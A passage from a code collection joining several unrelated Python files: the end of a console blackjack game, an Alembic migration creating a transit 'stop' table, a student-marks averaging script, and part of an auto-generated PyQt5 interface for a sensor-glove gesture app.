if player_hand_val[0] / 2 == 11: # check for split-Aces corner case (deal only 1 card to each ace,
bj.player1.double_down = True # if that card is 10, pay only 1x bet, not 1.5)
split_aces = True
elif player_hand_val[0] / 2 == 9 or player_hand_val[0] / 2 == 10:
bj.player1.double_down = True
if split_aces is True: #special case for splitting aces
for i in range(0,2): #run once for each card
while True:
p_choice = input("Do you want to Double Down? yes\\no\n")
if p_choice != "yes" and p_choice != "no":
print("Wrong input.\n")
continue
else:
break
if p_choice == "yes" and i == 0: # when player chose to split aces and double down
double_down()
bj.table.draw_table(0.5)
elif p_choice == "yes" and i == 1:
double_down(bj.player1.hand2) # <------- end PCP with final_hand_value(_\2) unchecked results
bj.table.draw_table(0.5)
elif i == 0: # deal one card for first ace
hit()
bj.player1.final_hand_val = bj.player1.hand_value_check(bj.player1.hand)
bj.table.draw_table(0.5)
elif i == 1: # and one for second ace
hit(bj.player1.hand2)
bj.player1.final_hand2_val = bj.player1.hand_value_check(bj.player1.hand2) # <------- end PCP with final_hand_value(_\2) unchecked results
bj.table.draw_table(0.5)
else: # general case - 2 loops for each of 2 non-Ace split hands
for i in range(0, 2):
p_choice = ask_user()
if i == 0 and p_choice == "dd" or p_choice == "double down" or p_choice == "double":
double_down()
bj.player1.went_double = False # Turn down DD flag for possible DD on second hand
bj.table.draw_table(0.5)
elif i == 1 and p_choice == "dd" or p_choice == "double down" or p_choice == "double":
double_down(bj.player1.hand2)
bj.table.draw_table(0.5) # <------- end PCP with final_hand_value(_\2) unchecked results
else:
ask_counter = 0
while True:
if ask_counter > 0:
p_choice = ask_user()
if i == 0 and p_choice == "hit":
hit()
check_for_bust_or_bj()
if bj.player1.final_hand_val == 21 or bj.player1.final_hand_val == "bust":
bj.table.draw_table(0.5)
break
else:
ask_counter += 1
bj.table.draw_table(0.5)
continue
elif i == 0 and p_choice == "stand":
stand()
bj.table.draw_table(0.33)
break
elif i == 1 and p_choice == "hit":
hit(bj.player1.hand2)
check_for_bust_or_bj(bj.player1.hand2)
if bj.player1.final_hand2_val == 21 or bj.player1.final_hand2_val == "bust":
bj.table.draw_table(0.5)
break # <------- end PCP with final_hand_value(_\2) unchecked results
else:
ask_counter += 1
bj.table.draw_table(0.5)
continue
elif i == 1 and p_choice == "stand":
stand(bj.player1.hand2)
bj.table.draw_table(0.33)
break # <------- end PCP with final_hand_value(_\2) unchecked results
elif p_choice == "dd" or p_choice == "double" or p_choice == "double down":
double_down() # <------- end PCP with final_hand_value(_\2) unchecked results
bj.table.draw_table(0.5)
else:
counter = 0 # entering this branch with a valid p_choice
while True: # counter allows us to do it only starting from the second run of the loop
if counter > 0:
bj.player1.split = False
bj.player1.double_down = False
p_choice = ask_user()
if p_choice == "hit":
hit()
check_for_bust_or_bj()
counter += 1
if bj.player1.final_hand_val == 21 or bj.player1.final_hand_val == "bust":
bj.table.draw_table(1)
break # <------- end PCP with final_hand_value(_\2) unchecked results
else:
bj.table.draw_table(0.8)
continue
elif p_choice == "stand":
stand()
bj.table.draw_table(0.8)
break # <------- end PCP with final_hand_value(_\2) unchecked results
# normalize final hand values to single "int"s
if bj.player1.final_hand_val == "bust" and bj.player1.final_hand2_val == "bust" and bj.player1.went_split is True:
bj.dealer.bankroll += bj.bank.player1_bet
bj.dealer.bankroll += bj.bank.player1_bet2
return
elif bj.player1.went_split is False and bj.player1.final_hand_val == "bust":
bj.dealer.bankroll += bj.bank.player1_bet
return
else:
if type(bj.player1.final_hand_val) == list:
bj.player1.final_hand_val = max(bj.player1.final_hand_val)
if type(bj.player1.final_hand2_val) == list:
bj.player1.final_hand2_val = max(bj.player1.final_hand2_val)
# DEALER PHASE
bj.table.dealer_phase = True
bj.table.draw_table() # Dealer reveals face-down card
while True:
if dealer_hand_val[0] < 17: # If hand val is less than 17, dealer keeps drawing cards
bj.dealer.hand.append(bj.deck.remove_card())
dealer_hand_val = bj.dealer.hand_value_check(bj.dealer.hand)
bj.table.draw_table(0.4)
continue
else: # If hand val is 17 or more, dealer stops drawing
if dealer_hand_val[0] > 21:
bj.dealer.final_hand_value = 0 # dealer goes bust
bj.table.draw_table(1)
break
else:
bj.dealer.final_hand_value = dealer_hand_val[0]
bj.table.draw_table(1)
break
# SHOWDOWN
# Payment's for player's first hand
if bj.player1.final_hand_val == "bust":
bj.dealer.bankroll += bj.bank.player1_bet
else:
if bj.dealer.final_hand_value == bj.player1.final_hand_val:
bj.player1.bankroll += bj.bank.player1_bet
elif bj.dealer.final_hand_value > bj.player1.final_hand_val:
bj.dealer.bankroll += bj.bank.player1_bet
elif bj.dealer.final_hand_value < bj.player1.final_hand_val:
bj.dealer.bankroll -= bj.bank.player1_bet
bj.player1.bankroll += bj.bank.player1_bet * 2
# Payments for player's second hand
if bj.player1.final_hand2_val == "bust":
bj.dealer.bankroll += bj.bank.player1_bet2
else:
if bj.dealer.final_hand_value == bj.player1.final_hand2_val:
bj.player1.bankroll += bj.bank.player1_bet2
elif bj.dealer.final_hand_value > bj.player1.final_hand2_val:
bj.dealer.bankroll += bj.bank.player1_bet2
elif bj.dealer.final_hand_value < bj.player1.final_hand2_val:
bj.dealer.bankroll -= bj.bank.player1_bet2
bj.player1.bankroll += bj.bank.player1_bet2 * 2
bj.table.draw_table(0.33)
bj = Game()
while True:
bj.play_game()
# while True:
# answer = input("Play another hand? Y/N\n")
# if answer != "Y" and answer != "y" and answer != "N" and answer != "n":
# print("Wrong input, try again")
# elif answer == "y" or "Y":
# bj.play_game()
# continue
# else:
# break
|
991,273 | e83a3ab4e38e89534b3ffc1e1bf95e2d17529aa1 | """initial migration
Revision ID: 55ca2c0b5330
Revises:
Create Date: 2018-12-29 20:10:44.477132
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '55ca2c0b5330'
down_revision = None
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.create_table('stop',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('last_run', sa.DateTime(), nullable=True),
sa.Column('name', sa.String(length=200), nullable=True),
sa.Column('matches', sa.Integer(), nullable=True),
sa.Column('lat', sa.Float(), nullable=True),
sa.Column('lon', sa.Float(), nullable=True),
sa.Column('county', sa.String(), nullable=True),
sa.Column('turbo_url', sa.String(), nullable=True),
sa.Column('isStation', sa.Boolean(), nullable=True),
sa.Column('exception', sa.String(), nullable=True),
sa.Column('names_in_osm', sa.String(), nullable=True),
sa.PrimaryKeyConstraint('id')
)
op.create_index(op.f('ix_stop_name'), 'stop', ['name'], unique=False)
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_index(op.f('ix_stop_name'), table_name='stop')
op.drop_table('stop')
# ### end Alembic commands ###
|
991,274 | b29c3f26970376fc106335b367f4e87c0cb1cc9d | def average(x,y,z):
m= (x+y+z)/3
return ("{:.2f}".format(m))
if __name__ == '__main__':
n = int(input())
student_marks = {}
for i in range(n):
name, *line = input().split()
scores = list(map(float, line))
student_marks[name] = scores
query_name = input()
print(average(student_marks[query_name][0], student_marks[query_name][1], student_marks[query_name][2]))
|
991,275 | d713ad01f97b3c00cf7d82c709965124140b67ee | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'HandsOn_GUI_Layout.ui'
#
# Created by: PyQt5 UI code generator 5.5.1
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_MainWindow(object):
def setupUi(self, MainWindow):
MainWindow.setObjectName("MainWindow")
MainWindow.resize(1280, 960)
icon = QtGui.QIcon()
icon.addPixmap(QtGui.QPixmap("HandsOn_Capstone/Glove_Layout_1.PNG"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
MainWindow.setWindowIcon(icon)
self.centralwidget = QtWidgets.QWidget(MainWindow)
font = QtGui.QFont()
font.setPointSize(9)
self.centralwidget.setFont(font)
self.centralwidget.setObjectName("centralwidget")
self.verticalLayout = QtWidgets.QVBoxLayout(self.centralwidget)
self.verticalLayout.setObjectName("verticalLayout")
self.tabWidget = QtWidgets.QTabWidget(self.centralwidget)
font = QtGui.QFont()
font.setBold(False)
font.setWeight(50)
self.tabWidget.setFont(font)
self.tabWidget.setObjectName("tabWidget")
self.captureTab = QtWidgets.QWidget()
self.captureTab.setObjectName("captureTab")
self.verticalLayout_3 = QtWidgets.QVBoxLayout(self.captureTab)
self.verticalLayout_3.setObjectName("verticalLayout_3")
self.horizontalLayout_capFile = QtWidgets.QHBoxLayout()
self.horizontalLayout_capFile.setObjectName("horizontalLayout_capFile")
self.labelFile = QtWidgets.QLabel(self.captureTab)
self.labelFile.setObjectName("labelFile")
self.horizontalLayout_capFile.addWidget(self.labelFile)
self.lineEditFileOut = QtWidgets.QLineEdit(self.captureTab)
self.lineEditFileOut.setObjectName("lineEditFileOut")
self.horizontalLayout_capFile.addWidget(self.lineEditFileOut)
self.btnFileOut = QtWidgets.QPushButton(self.captureTab)
self.btnFileOut.setObjectName("btnFileOut")
self.horizontalLayout_capFile.addWidget(self.btnFileOut)
self.verticalLayout_3.addLayout(self.horizontalLayout_capFile)
self.line = QtWidgets.QFrame(self.captureTab)
self.line.setFrameShape(QtWidgets.QFrame.HLine)
self.line.setFrameShadow(QtWidgets.QFrame.Sunken)
self.line.setObjectName("line")
self.verticalLayout_3.addWidget(self.line)
self.labelOutFileViewer = QtWidgets.QLabel(self.captureTab)
self.labelOutFileViewer.setObjectName("labelOutFileViewer")
self.verticalLayout_3.addWidget(self.labelOutFileViewer)
self.plainTextEditFileOut = QtWidgets.QPlainTextEdit(self.captureTab)
self.plainTextEditFileOut.setObjectName("plainTextEditFileOut")
self.verticalLayout_3.addWidget(self.plainTextEditFileOut)
self.horizontalLayout_gestCap = QtWidgets.QHBoxLayout()
self.horizontalLayout_gestCap.setObjectName("horizontalLayout_gestCap")
self.labelGestCap = QtWidgets.QLabel(self.captureTab)
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.labelGestCap.setFont(font)
self.labelGestCap.setObjectName("labelGestCap")
self.horizontalLayout_gestCap.addWidget(self.labelGestCap)
self.lineEditGestCap = QtWidgets.QLineEdit(self.captureTab)
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.lineEditGestCap.setFont(font)
self.lineEditGestCap.setObjectName("lineEditGestCap")
self.horizontalLayout_gestCap.addWidget(self.lineEditGestCap)
self.btnGestCap = QtWidgets.QPushButton(self.captureTab)
self.btnGestCap.setEnabled(True)
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.btnGestCap.setFont(font)
self.btnGestCap.setCheckable(False)
self.btnGestCap.setDefault(False)
self.btnGestCap.setObjectName("btnGestCap")
self.horizontalLayout_gestCap.addWidget(self.btnGestCap)
self.verticalLayout_3.addLayout(self.horizontalLayout_gestCap)
self.tabWidget.addTab(self.captureTab, "")
self.trainTab = QtWidgets.QWidget()
self.trainTab.setObjectName("trainTab")
self.verticalLayout_4 = QtWidgets.QVBoxLayout(self.trainTab)
self.verticalLayout_4.setObjectName("verticalLayout_4")
self.horizontalLayout_trainFile = QtWidgets.QHBoxLayout()
self.horizontalLayout_trainFile.setObjectName("horizontalLayout_trainFile")
self.labelTrainFile = QtWidgets.QLabel(self.trainTab)
self.labelTrainFile.setObjectName("labelTrainFile")
self.horizontalLayout_trainFile.addWidget(self.labelTrainFile)
self.lineEditTrainFile = QtWidgets.QLineEdit(self.trainTab)
self.lineEditTrainFile.setObjectName("lineEditTrainFile")
self.horizontalLayout_trainFile.addWidget(self.lineEditTrainFile)
self.btnTrainFile = QtWidgets.QPushButton(self.trainTab)
self.btnTrainFile.setObjectName("btnTrainFile")
self.horizontalLayout_trainFile.addWidget(self.btnTrainFile)
self.verticalLayout_4.addLayout(self.horizontalLayout_trainFile)
self.line_2 = QtWidgets.QFrame(self.trainTab)
self.line_2.setFrameShape(QtWidgets.QFrame.HLine)
self.line_2.setFrameShadow(QtWidgets.QFrame.Sunken)
self.line_2.setObjectName("line_2")
self.verticalLayout_4.addWidget(self.line_2)
self.labelTrainFileViewer = QtWidgets.QLabel(self.trainTab)
self.labelTrainFileViewer.setObjectName("labelTrainFileViewer")
self.verticalLayout_4.addWidget(self.labelTrainFileViewer)
self.plainTextEditTrainFile = QtWidgets.QPlainTextEdit(self.trainTab)
self.plainTextEditTrainFile.setObjectName("plainTextEditTrainFile")
self.verticalLayout_4.addWidget(self.plainTextEditTrainFile)
self.horizontalLayout_train = QtWidgets.QHBoxLayout()
self.horizontalLayout_train.setObjectName("horizontalLayout_train")
self.labelTrainStatus = QtWidgets.QLabel(self.trainTab)
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.labelTrainStatus.setFont(font)
self.labelTrainStatus.setObjectName("labelTrainStatus")
self.horizontalLayout_train.addWidget(self.labelTrainStatus)
self.lineEditTrainStatus = QtWidgets.QLineEdit(self.trainTab)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.lineEditTrainStatus.sizePolicy().hasHeightForWidth())
self.lineEditTrainStatus.setSizePolicy(sizePolicy)
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.lineEditTrainStatus.setFont(font)
self.lineEditTrainStatus.setReadOnly(True)
self.lineEditTrainStatus.setObjectName("lineEditTrainStatus")
self.horizontalLayout_train.addWidget(self.lineEditTrainStatus)
spacerItem = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.horizontalLayout_train.addItem(spacerItem)
spacerItem1 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.horizontalLayout_train.addItem(spacerItem1)
self.btnTrainClassifier = QtWidgets.QPushButton(self.trainTab)
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.btnTrainClassifier.setFont(font)
self.btnTrainClassifier.setObjectName("btnTrainClassifier")
self.horizontalLayout_train.addWidget(self.btnTrainClassifier)
self.verticalLayout_4.addLayout(self.horizontalLayout_train)
self.tabWidget.addTab(self.trainTab, "")
self.classifyRealTab = QtWidgets.QWidget()
self.classifyRealTab.setObjectName("classifyRealTab")
self.horizontalLayout_4 = QtWidgets.QHBoxLayout(self.classifyRealTab)
self.horizontalLayout_4.setObjectName("horizontalLayout_4")
self.verticalLayout_ClassRT = QtWidgets.QVBoxLayout()
self.verticalLayout_ClassRT.setObjectName("verticalLayout_ClassRT")
self.checkBoxTtoS = QtWidgets.QCheckBox(self.classifyRealTab)
self.checkBoxTtoS.setChecked(True)
self.checkBoxTtoS.setObjectName("checkBoxTtoS")
self.verticalLayout_ClassRT.addWidget(self.checkBoxTtoS)
self.checkBoxClassRTdebug = QtWidgets.QCheckBox(self.classifyRealTab)
self.checkBoxClassRTdebug.setChecked(False)
self.checkBoxClassRTdebug.setObjectName("checkBoxClassRTdebug")
self.verticalLayout_ClassRT.addWidget(self.checkBoxClassRTdebug)
self.horizontalLayout_ClassRtDelay = QtWidgets.QHBoxLayout()
self.horizontalLayout_ClassRtDelay.setObjectName("horizontalLayout_ClassRtDelay")
self.labelClassRtDelay = QtWidgets.QLabel(self.classifyRealTab)
self.labelClassRtDelay.setObjectName("labelClassRtDelay")
self.horizontalLayout_ClassRtDelay.addWidget(self.labelClassRtDelay)
self.lineEditClassRtDelay = QtWidgets.QLineEdit(self.classifyRealTab)
self.lineEditClassRtDelay.setObjectName("lineEditClassRtDelay")
self.horizontalLayout_ClassRtDelay.addWidget(self.lineEditClassRtDelay)
spacerItem2 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.horizontalLayout_ClassRtDelay.addItem(spacerItem2)
self.verticalLayout_ClassRT.addLayout(self.horizontalLayout_ClassRtDelay)
spacerItem3 = QtWidgets.QSpacerItem(20, 40, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding)
self.verticalLayout_ClassRT.addItem(spacerItem3)
self.horizontalLayout_ClassRT = QtWidgets.QHBoxLayout()
self.horizontalLayout_ClassRT.setObjectName("horizontalLayout_ClassRT")
self.labelClassRT = QtWidgets.QLabel(self.classifyRealTab)
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.labelClassRT.setFont(font)
self.labelClassRT.setObjectName("labelClassRT")
self.horizontalLayout_ClassRT.addWidget(self.labelClassRT)
self.btnClassifyStop = QtWidgets.QPushButton(self.classifyRealTab)
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.btnClassifyStop.setFont(font)
self.btnClassifyStop.setObjectName("btnClassifyStop")
self.horizontalLayout_ClassRT.addWidget(self.btnClassifyStop)
self.btnClassifyStart = QtWidgets.QPushButton(self.classifyRealTab)
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.btnClassifyStart.setFont(font)
self.btnClassifyStart.setObjectName("btnClassifyStart")
self.horizontalLayout_ClassRT.addWidget(self.btnClassifyStart)
self.verticalLayout_ClassRT.addLayout(self.horizontalLayout_ClassRT)
self.horizontalLayout_4.addLayout(self.verticalLayout_ClassRT)
self.plainTextEditClassRT = QtWidgets.QPlainTextEdit(self.classifyRealTab)
font = QtGui.QFont()
font.setPointSize(16)
font.setBold(True)
font.setWeight(75)
self.plainTextEditClassRT.setFont(font)
self.plainTextEditClassRT.setReadOnly(True)
self.plainTextEditClassRT.setObjectName("plainTextEditClassRT")
self.horizontalLayout_4.addWidget(self.plainTextEditClassRT)
self.plainTextEditClassRT.raise_()
self.tabWidget.addTab(self.classifyRealTab, "")
self.verticalLayout.addWidget(self.tabWidget)
self.line_3 = QtWidgets.QFrame(self.centralwidget)
self.line_3.setFrameShape(QtWidgets.QFrame.HLine)
self.line_3.setFrameShadow(QtWidgets.QFrame.Sunken)
self.line_3.setObjectName("line_3")
self.verticalLayout.addWidget(self.line_3)
self.horizontalLayout_dataOut = QtWidgets.QHBoxLayout()
self.horizontalLayout_dataOut.setObjectName("horizontalLayout_dataOut")
self.gBoxFlex = QtWidgets.QGroupBox(self.centralwidget)
font = QtGui.QFont()
font.setBold(False)
font.setWeight(50)
self.gBoxFlex.setFont(font)
self.gBoxFlex.setObjectName("gBoxFlex")
self.formLayout = QtWidgets.QFormLayout(self.gBoxFlex)
self.formLayout.setObjectName("formLayout")
self.indexLabel = QtWidgets.QLabel(self.gBoxFlex)
self.indexLabel.setObjectName("indexLabel")
self.formLayout.setWidget(0, QtWidgets.QFormLayout.LabelRole, self.indexLabel)
self.indexLineEdit = QtWidgets.QLineEdit(self.gBoxFlex)
font = QtGui.QFont()
font.setBold(False)
font.setWeight(50)
self.indexLineEdit.setFont(font)
self.indexLineEdit.setReadOnly(True)
self.indexLineEdit.setObjectName("indexLineEdit")
self.formLayout.setWidget(0, QtWidgets.QFormLayout.FieldRole, self.indexLineEdit)
self.indexKnuckleLabel = QtWidgets.QLabel(self.gBoxFlex)
self.indexKnuckleLabel.setObjectName("indexKnuckleLabel")
self.formLayout.setWidget(1, QtWidgets.QFormLayout.LabelRole, self.indexKnuckleLabel)
self.indexKnuckleLineEdit = QtWidgets.QLineEdit(self.gBoxFlex)
font = QtGui.QFont()
font.setBold(False)
font.setWeight(50)
self.indexKnuckleLineEdit.setFont(font)
self.indexKnuckleLineEdit.setReadOnly(True)
self.indexKnuckleLineEdit.setObjectName("indexKnuckleLineEdit")
self.formLayout.setWidget(1, QtWidgets.QFormLayout.FieldRole, self.indexKnuckleLineEdit)
self.middleLabel = QtWidgets.QLabel(self.gBoxFlex)
self.middleLabel.setObjectName("middleLabel")
self.formLayout.setWidget(2, QtWidgets.QFormLayout.LabelRole, self.middleLabel)
self.middleLineEdit = QtWidgets.QLineEdit(self.gBoxFlex)
font = QtGui.QFont()
font.setBold(False)
font.setWeight(50)
self.middleLineEdit.setFont(font)
self.middleLineEdit.setReadOnly(True)
self.middleLineEdit.setObjectName("middleLineEdit")
self.formLayout.setWidget(2, QtWidgets.QFormLayout.FieldRole, self.middleLineEdit)
self.middleKnuckleLabel = QtWidgets.QLabel(self.gBoxFlex)
self.middleKnuckleLabel.setObjectName("middleKnuckleLabel")
self.formLayout.setWidget(3, QtWidgets.QFormLayout.LabelRole, self.middleKnuckleLabel)
self.middleKnuckleLineEdit = QtWidgets.QLineEdit(self.gBoxFlex)
font = QtGui.QFont()
font.setBold(False)
font.setWeight(50)
self.middleKnuckleLineEdit.setFont(font)
self.middleKnuckleLineEdit.setReadOnly(True)
self.middleKnuckleLineEdit.setObjectName("middleKnuckleLineEdit")
self.formLayout.setWidget(3, QtWidgets.QFormLayout.FieldRole, self.middleKnuckleLineEdit)
self.ringLabel = QtWidgets.QLabel(self.gBoxFlex)
self.ringLabel.setObjectName("ringLabel")
self.formLayout.setWidget(4, QtWidgets.QFormLayout.LabelRole, self.ringLabel)
self.ringLineEdit = QtWidgets.QLineEdit(self.gBoxFlex)
font = QtGui.QFont()
font.setBold(False)
font.setWeight(50)
self.ringLineEdit.setFont(font)
self.ringLineEdit.setReadOnly(True)
self.ringLineEdit.setObjectName("ringLineEdit")
self.formLayout.setWidget(4, QtWidgets.QFormLayout.FieldRole, self.ringLineEdit)
self.ringKnuckleLabel = QtWidgets.QLabel(self.gBoxFlex)
self.ringKnuckleLabel.setObjectName("ringKnuckleLabel")
self.formLayout.setWidget(5, QtWidgets.QFormLayout.LabelRole, self.ringKnuckleLabel)
self.ringKnuckleLineEdit = QtWidgets.QLineEdit(self.gBoxFlex)
font = QtGui.QFont()
font.setBold(False)
font.setWeight(50)
self.ringKnuckleLineEdit.setFont(font)
self.ringKnuckleLineEdit.setReadOnly(True)
self.ringKnuckleLineEdit.setObjectName("ringKnuckleLineEdit")
self.formLayout.setWidget(5, QtWidgets.QFormLayout.FieldRole, self.ringKnuckleLineEdit)
self.pinkyLabel = QtWidgets.QLabel(self.gBoxFlex)
self.pinkyLabel.setObjectName("pinkyLabel")
self.formLayout.setWidget(6, QtWidgets.QFormLayout.LabelRole, self.pinkyLabel)
self.pinkyLineEdit = QtWidgets.QLineEdit(self.gBoxFlex)
font = QtGui.QFont()
font.setBold(False)
font.setWeight(50)
self.pinkyLineEdit.setFont(font)
self.pinkyLineEdit.setReadOnly(True)
self.pinkyLineEdit.setObjectName("pinkyLineEdit")
self.formLayout.setWidget(6, QtWidgets.QFormLayout.FieldRole, self.pinkyLineEdit)
self.thumbLabel = QtWidgets.QLabel(self.gBoxFlex)
self.thumbLabel.setObjectName("thumbLabel")
self.formLayout.setWidget(7, QtWidgets.QFormLayout.LabelRole, self.thumbLabel)
self.thumbLineEdit = QtWidgets.QLineEdit(self.gBoxFlex)
font = QtGui.QFont()
font.setBold(False)
font.setWeight(50)
self.thumbLineEdit.setFont(font)
self.thumbLineEdit.setReadOnly(True)
self.thumbLineEdit.setObjectName("thumbLineEdit")
self.formLayout.setWidget(7, QtWidgets.QFormLayout.FieldRole, self.thumbLineEdit)
self.thumbKnuckeLabel = QtWidgets.QLabel(self.gBoxFlex)
self.thumbKnuckeLabel.setObjectName("thumbKnuckeLabel")
self.formLayout.setWidget(8, QtWidgets.QFormLayout.LabelRole, self.thumbKnuckeLabel)
self.thumbKnuckeLineEdit = QtWidgets.QLineEdit(self.gBoxFlex)
font = QtGui.QFont()
font.setBold(False)
font.setWeight(50)
self.thumbKnuckeLineEdit.setFont(font)
self.thumbKnuckeLineEdit.setReadOnly(True)
self.thumbKnuckeLineEdit.setObjectName("thumbKnuckeLineEdit")
self.formLayout.setWidget(8, QtWidgets.QFormLayout.FieldRole, self.thumbKnuckeLineEdit)
self.horizontalLayout_dataOut.addWidget(self.gBoxFlex)
self.gBoxTouch = QtWidgets.QGroupBox(self.centralwidget)
self.gBoxTouch.setObjectName("gBoxTouch")
self.formLayout_2 = QtWidgets.QFormLayout(self.gBoxTouch)
self.formLayout_2.setObjectName("formLayout_2")
self.indexSideLabel = QtWidgets.QLabel(self.gBoxTouch)
self.indexSideLabel.setObjectName("indexSideLabel")
self.formLayout_2.setWidget(0, QtWidgets.QFormLayout.LabelRole, self.indexSideLabel)
self.indexSideLineEdit = QtWidgets.QLineEdit(self.gBoxTouch)
font = QtGui.QFont()
font.setBold(False)
font.setWeight(50)
self.indexSideLineEdit.setFont(font)
self.indexSideLineEdit.setReadOnly(True)
self.indexSideLineEdit.setObjectName("indexSideLineEdit")
self.formLayout_2.setWidget(0, QtWidgets.QFormLayout.FieldRole, self.indexSideLineEdit)
self.indexTopLabel = QtWidgets.QLabel(self.gBoxTouch)
self.indexTopLabel.setObjectName("indexTopLabel")
self.formLayout_2.setWidget(1, QtWidgets.QFormLayout.LabelRole, self.indexTopLabel)
self.indexTopLineEdit = QtWidgets.QLineEdit(self.gBoxTouch)
font = QtGui.QFont()
font.setBold(False)
font.setWeight(50)
self.indexTopLineEdit.setFont(font)
self.indexTopLineEdit.setReadOnly(True)
self.indexTopLineEdit.setObjectName("indexTopLineEdit")
self.formLayout_2.setWidget(1, QtWidgets.QFormLayout.FieldRole, self.indexTopLineEdit)
self.middleTopLabel = QtWidgets.QLabel(self.gBoxTouch)
self.middleTopLabel.setObjectName("middleTopLabel")
self.formLayout_2.setWidget(2, QtWidgets.QFormLayout.LabelRole, self.middleTopLabel)
self.middleTopLineEdit = QtWidgets.QLineEdit(self.gBoxTouch)
font = QtGui.QFont()
font.setBold(False)
font.setWeight(50)
self.middleTopLineEdit.setFont(font)
self.middleTopLineEdit.setReadOnly(True)
self.middleTopLineEdit.setObjectName("middleTopLineEdit")
self.formLayout_2.setWidget(2, QtWidgets.QFormLayout.FieldRole, self.middleTopLineEdit)
self.middleSideLabel = QtWidgets.QLabel(self.gBoxTouch)
self.middleSideLabel.setObjectName("middleSideLabel")
self.formLayout_2.setWidget(3, QtWidgets.QFormLayout.LabelRole, self.middleSideLabel)
self.middleSideLineEdit = QtWidgets.QLineEdit(self.gBoxTouch)
font = QtGui.QFont()
font.setBold(False)
font.setWeight(50)
self.middleSideLineEdit.setFont(font)
self.middleSideLineEdit.setReadOnly(True)
self.middleSideLineEdit.setObjectName("middleSideLineEdit")
self.formLayout_2.setWidget(3, QtWidgets.QFormLayout.FieldRole, self.middleSideLineEdit)
self.ringSideLabel = QtWidgets.QLabel(self.gBoxTouch)
self.ringSideLabel.setObjectName("ringSideLabel")
self.formLayout_2.setWidget(4, QtWidgets.QFormLayout.LabelRole, self.ringSideLabel)
self.ringSideLineEdit = QtWidgets.QLineEdit(self.gBoxTouch)
font = QtGui.QFont()
font.setBold(False)
font.setWeight(50)
self.ringSideLineEdit.setFont(font)
self.ringSideLineEdit.setReadOnly(True)
self.ringSideLineEdit.setObjectName("ringSideLineEdit")
self.formLayout_2.setWidget(4, QtWidgets.QFormLayout.FieldRole, self.ringSideLineEdit)
self.pinkySideLabel = QtWidgets.QLabel(self.gBoxTouch)
self.pinkySideLabel.setObjectName("pinkySideLabel")
self.formLayout_2.setWidget(5, QtWidgets.QFormLayout.LabelRole, self.pinkySideLabel)
self.pinkySideLineEdit = QtWidgets.QLineEdit(self.gBoxTouch)
font = QtGui.QFont()
font.setBold(False)
font.setWeight(50)
self.pinkySideLineEdit.setFont(font)
self.pinkySideLineEdit.setReadOnly(True)
self.pinkySideLineEdit.setObjectName("pinkySideLineEdit")
self.formLayout_2.setWidget(5, QtWidgets.QFormLayout.FieldRole, self.pinkySideLineEdit)
self.pinkyTopLabel = QtWidgets.QLabel(self.gBoxTouch)
self.pinkyTopLabel.setObjectName("pinkyTopLabel")
self.formLayout_2.setWidget(6, QtWidgets.QFormLayout.LabelRole, self.pinkyTopLabel)
self.pinkyTopLineEdit = QtWidgets.QLineEdit(self.gBoxTouch)
font = QtGui.QFont()
font.setBold(False)
font.setWeight(50)
self.pinkyTopLineEdit.setFont(font)
self.pinkyTopLineEdit.setReadOnly(True)
self.pinkyTopLineEdit.setObjectName("pinkyTopLineEdit")
self.formLayout_2.setWidget(6, QtWidgets.QFormLayout.FieldRole, self.pinkyTopLineEdit)
self.horizontalLayout_dataOut.addWidget(self.gBoxTouch)
self.verticalLayout_quat_euler = QtWidgets.QVBoxLayout()
self.verticalLayout_quat_euler.setObjectName("verticalLayout_quat_euler")
self.gBoxQuat = QtWidgets.QGroupBox(self.centralwidget)
self.gBoxQuat.setObjectName("gBoxQuat")
self.formLayout_3 = QtWidgets.QFormLayout(self.gBoxQuat)
self.formLayout_3.setObjectName("formLayout_3")
self.quatWLabel = QtWidgets.QLabel(self.gBoxQuat)
self.quatWLabel.setObjectName("quatWLabel")
self.formLayout_3.setWidget(0, QtWidgets.QFormLayout.LabelRole, self.quatWLabel)
self.quatWLineEdit = QtWidgets.QLineEdit(self.gBoxQuat)
font = QtGui.QFont()
font.setBold(False)
font.setWeight(50)
self.quatWLineEdit.setFont(font)
self.quatWLineEdit.setReadOnly(True)
self.quatWLineEdit.setObjectName("quatWLineEdit")
self.formLayout_3.setWidget(0, QtWidgets.QFormLayout.FieldRole, self.quatWLineEdit)
self.quatXLabel = QtWidgets.QLabel(self.gBoxQuat)
self.quatXLabel.setObjectName("quatXLabel")
self.formLayout_3.setWidget(1, QtWidgets.QFormLayout.LabelRole, self.quatXLabel)
self.quatXLineEdit = QtWidgets.QLineEdit(self.gBoxQuat)
font = QtGui.QFont()
font.setBold(False)
font.setWeight(50)
self.quatXLineEdit.setFont(font)
self.quatXLineEdit.setReadOnly(True)
self.quatXLineEdit.setObjectName("quatXLineEdit")
self.formLayout_3.setWidget(1, QtWidgets.QFormLayout.FieldRole, self.quatXLineEdit)
self.quatYLabel = QtWidgets.QLabel(self.gBoxQuat)
